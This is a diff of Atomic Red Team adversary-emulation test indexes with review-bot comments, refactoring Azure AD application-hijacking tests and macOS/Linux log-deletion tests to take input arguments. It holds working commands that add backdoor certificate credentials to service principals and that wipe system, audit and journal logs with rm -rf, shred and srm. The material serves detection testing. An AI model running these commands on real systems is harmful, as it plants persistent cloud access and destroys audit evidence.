diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index 43a59236..e3f59826 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -37535,14 +37535,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37566,21 +37558,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
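Review bot: Now that the PFX export is gone, `-KeyExportPolicy Exportable` on the New-SelfSignedCertificate line no longer has a consumer and leaves an exportable private key for a credential that can sign in as the service principal sitting in CurrentUser\My until cleanup runs; `-KeyExportPolicy NonExportable` should be enough for Connect-AzureAD, which only reads the key from the store via -CertificateThumbprint. The "Application Hijacking worked" line is printed regardless of whether Connect-AzureAD succeeded, so if the call fails non-terminatingly `$auth` is null and the test reports a login as an empty account; guard it with `if (-not $auth) { Write-Warning "Sign-in with the new certificate failed"; exit }`. The fixed 30 s sleep is a guess at credential propagation; a short retry loop around Connect-AzureAD would be more reliable, though how long propagation takes cannot be told from here.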
@@ -37593,8 +37582,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -37618,14 +37606,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37649,21 +37629,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37676,8 +37653,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
T1053.004:
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index d7b4d4e8..c1ff28fe 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -4580,10 +4580,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
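Review bot: The `get_prereq_command` creates the targets with a plain `touch`, while the executor needs `sudo` to remove them; /var/log and /var/audit are typically root-owned on both platforms, so the prereq fails for a non-root runner and the test never starts (unless the whole runner is already root). Use `sudo touch #{syslog_path}` and `sudo touch #{macos_audit_path}`. `rm -rf` is also more than the job needs now that the argument is a single file path: a user who passes a directory such as /var/log loses the whole tree, whereas `sudo rm -f #{syslog_path}` keeps the default behaviour. Finally, the default audit path is a dummy file the prereq creates, so the test deletes its own fixture rather than a real audit trail; the argument description should say so, or a detection engineer will expect the real /var/audit files to disappear.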
@@ -4598,7 +4621,6 @@ defense-evasion:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -4610,9 +4632,25 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
- truncate --size=0 /var/log/system.log #size parameter \n"
+ command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
+ truncate --size=0 #{system_log_path} #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
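Review bot: The new dependency only checks that the target file exists; macOS ships no `truncate` binary in the base system (it comes with GNU coreutils), so `prereq_command` should also verify the tool: `stat #{system_log_path} && command -v truncate`. The `touch` in `get_prereq_command` runs without sudo against a /var/log path that is normally root-owned, while the executor uses sudo, so it fails for a non-root runner; `sudo touch #{system_log_path}` matches the executor.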
@@ -4624,10 +4662,26 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
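Review bot: On the first executor line the redirection `> #{system_log_path}` is performed by the unprivileged shell before `sudo cat` starts, so the truncation happens as the calling user and fails with permission denied on a root-owned log unless the runner itself is root (the dd line is fine because dd opens the file itself under sudo). Run the redirect as root, e.g. `sudo sh -c 'cat /dev/null > #{system_log_path}'`, or `: | sudo tee #{system_log_path} >/dev/null`. The `touch` in `get_prereq_command` has the same privilege mismatch and should be `sudo touch #{system_log_path}`.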
@@ -4638,11 +4692,37 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.97.gz
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.98.gz
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
+ get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
executor:
command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
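Review bot: With the new defaults the second and third find patterns become `system.log.97.gz.*` and `system.log.98.gz.*`, which match nothing, and the first pattern `system.log.*` has already removed system.log.97.gz and system.log.98.gz by the time shred and unlink run, so those two lines are no-ops and the "name or prefix" description is misleading. If each tool is meant to remove its own fixture, match the names exactly: `-name "#{system_log_name2}"` and `-name "#{system_log_name3}"`. `shred` is also not in the macOS base system, so a `command -v shred` check belongs in `prereq_command`, and the prereq `touch` of /var/log files runs without the sudo the executor needs.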
@@ -4653,8 +4733,13 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
executor:
- command: 'sudo echo '''' > /var/log/system.log
+ command: 'sudo echo '''' > #{system_log_path}
'
name: sh
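Review bot: `sudo echo '' > #{system_log_path}` truncates the file through a redirect that the unprivileged shell opens before sudo runs, so it fails with permission denied on a root-owned log unless the runner itself is root; `sudo sh -c 'echo "" > #{system_log_path}'` performs the write as root. This is also the only test in the set that gained an input argument without a matching `dependencies` block, so it runs against a possibly missing file; adding the same `stat`/`touch` prereq as the neighbouring tests keeps the set consistent.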
@@ -4680,8 +4765,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo unlink /var/log/system.log
+ command: 'sudo unlink #{system_log_path}
'
name: sh
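Review bot: `get_prereq_command` touches the log without sudo while the executor unlinks it with sudo; on a root-owned /var/log path the prereq fails for a non-root runner and the test is never reached. Use `sudo touch #{system_log_path}` so the prereq runs with the same privileges the executor assumes.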
@@ -4694,8 +4795,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo shred -u -z -n 3 /var/log/system.log
+ command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
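Review bot: `shred` is not part of the macOS base system (it is a GNU coreutils tool), and the new dependency only checks the target file, so the executor still fails with "command not found" on a stock Mac; extend the check to `prereq_command: 'stat #{system_log_path} && command -v shred'`. The `touch` in `get_prereq_command` also runs without the sudo the executor uses, so it fails on a root-owned /var/log for a non-root runner; `sudo touch #{system_log_path}` fixes that.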
@@ -4708,10 +4825,31 @@ defense-evasion:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ system_log_folder:
+ description: path to log parent folder
+ type: string
+ default: "/var/log/"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path} #{system_log_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
+ #{system_log_folder}/system.log
+
+ '
executor:
command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
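Review bot: The default for `system_log_folder` is `/var/log/`, so the second executor line `sudo srm -r #{system_log_folder}` secure-wipes every log on the host in a default run, not just the fixture the prereq creates; since `get_prereq_command` already runs `mkdir -p` on the folder, defaulting it to a dedicated subdirectory (for example `/var/log/atomic_srm/`) would keep the recursive deletion contained while still exercising `srm -r`. The prereq's `mkdir -p` and `touch` run without the sudo the executor needs and fail for a non-root runner against a root-owned /var/log. `prereq_command` should also confirm `command -v srm`, since the referenced homebrew issue implies srm is not part of the macOS base system.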
@@ -4723,8 +4861,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
+ command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
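Review bot: `#{system_log_path}` is interpolated inside an AppleScript double-quoted string that itself sits inside a single-quoted shell string, so a path containing `"`, `\` or `'` breaks out of the literal instead of being passed through; either document the restriction on the argument (`description: path to system.log (must not contain quotes or backslashes)`) or build the command with AppleScript's `quoted form of`. The `touch` in `get_prereq_command` runs without the privileges the executor obtains through `with administrator privileges`, so on a root-owned /var/log the prereq fails for a non-root runner; use `sudo touch #{system_log_path}`.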
@@ -4738,8 +4892,24 @@ defense-evasion:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
+ command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
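Review bot: `tell application "Finder" to delete` moves the item to the Trash rather than unlinking it, and Finder acts as the logged-in user, so on a root-owned system.log the call is likely to be refused; the argument description should say the file is trashed, not removed, and the test's description (outside this hunk) should state the expected outcome on a real log. The `touch` in `get_prereq_command` also lacks the sudo a root-owned /var/log needs, so the prereq fails for a non-root runner.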
@@ -4753,9 +4923,25 @@ defense-evasion:
'
supported_platforms:
- linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: string
+ default: "/var/log/journal"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{journal_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+
+ '
executor:
command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
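Review bot: `sudo rm #{journal_folder}/*` has no `-r`, and on a systemd host /var/log/journal usually holds a per-machine-id subdirectory rather than files at the top level (inferred from how journald lays out its store; not visible here), so the rm reports "is a directory" and only the vacuum on the next line does any work; `sudo rm -rf #{journal_folder}/*` would deliver what the comment promises. The `mkdir -p` and `touch` in `get_prereq_command` run without the sudo the executor needs, so they fail for a non-root runner when the folder is root-owned; `sudo mkdir -p #{journal_folder} && sudo touch #{journal_folder}/T1070_002.journal` matches the executor. When the folder is absent the prereq creates a real-looking `/var/log/journal` tree that the executor then removes, which is fine as a fixture but worth a sentence in the argument description.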
@@ -4773,7 +4959,19 @@ defense-evasion:
description: Username of mail spool
type: string
default: root
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/spool/mail/#{username}
+
+ '
+ get_prereq_command: 'touch /var/spool/mail/#{username}
+
+ '
executor:
+ elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
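Review bot: `echo 0> /var/spool/mail/#{username}` empties the spool only by accident: the shell reads `0>` as a redirection of file descriptor 0, so the file is opened (and truncated) on stdin while echo prints a bare newline to stdout. Spell the intent out with `: > /var/spool/mail/#{username}` or `truncate -s 0 /var/spool/mail/#{username}`, and because the new `elevation_required: true` only flags the test and, as far as I can tell, does not prefix sudo, run the write as root like the sibling tests do (`sudo sh -c '...'`). The prereq `touch` in /var/spool/mail likewise needs root on most systems, so `sudo touch` there as well.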
@@ -4796,6 +4994,11 @@ defense-evasion:
'
name: bash
+ elevation_required: true
+ cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
+ ; fi
+
+ '
T1218.004:
technique:
x_mitre_platforms:
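Review bot: The new cleanup removes whatever `log_path` points at unless it is exactly the literal `/var/log/secure`, so a user who points the test at a real auth log living elsewhere (Debian-style `/var/log/auth.log`, for instance) has that log deleted by cleanup; the guard protects only one path. A safer rule is to remove only what the prereq created, e.g. have the prereq drop a marker (`touch "#{log_path}.atomic_created"`) and let cleanup run `[ -f "#{log_path}.atomic_created" ] && rm -f "#{log_path}" "#{log_path}.atomic_created"`. The test's executor and prerequisite commands start before this hunk, so I cannot see whether such a record already exists.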
@@ -62806,14 +63009,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62837,21 +63032,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62864,8 +63056,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -62889,14 +63080,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62920,21 +63103,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62947,8 +63127,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index d2498783..a9103054 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -3310,10 +3310,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
@@ -3325,9 +3348,25 @@ defense-evasion:
'
supported_platforms:
- linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: string
+ default: "/var/log/journal"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{journal_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+
+ '
executor:
command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -3345,7 +3384,19 @@ defense-evasion:
description: Username of mail spool
type: string
default: root
+ dependency_executor_name: sh
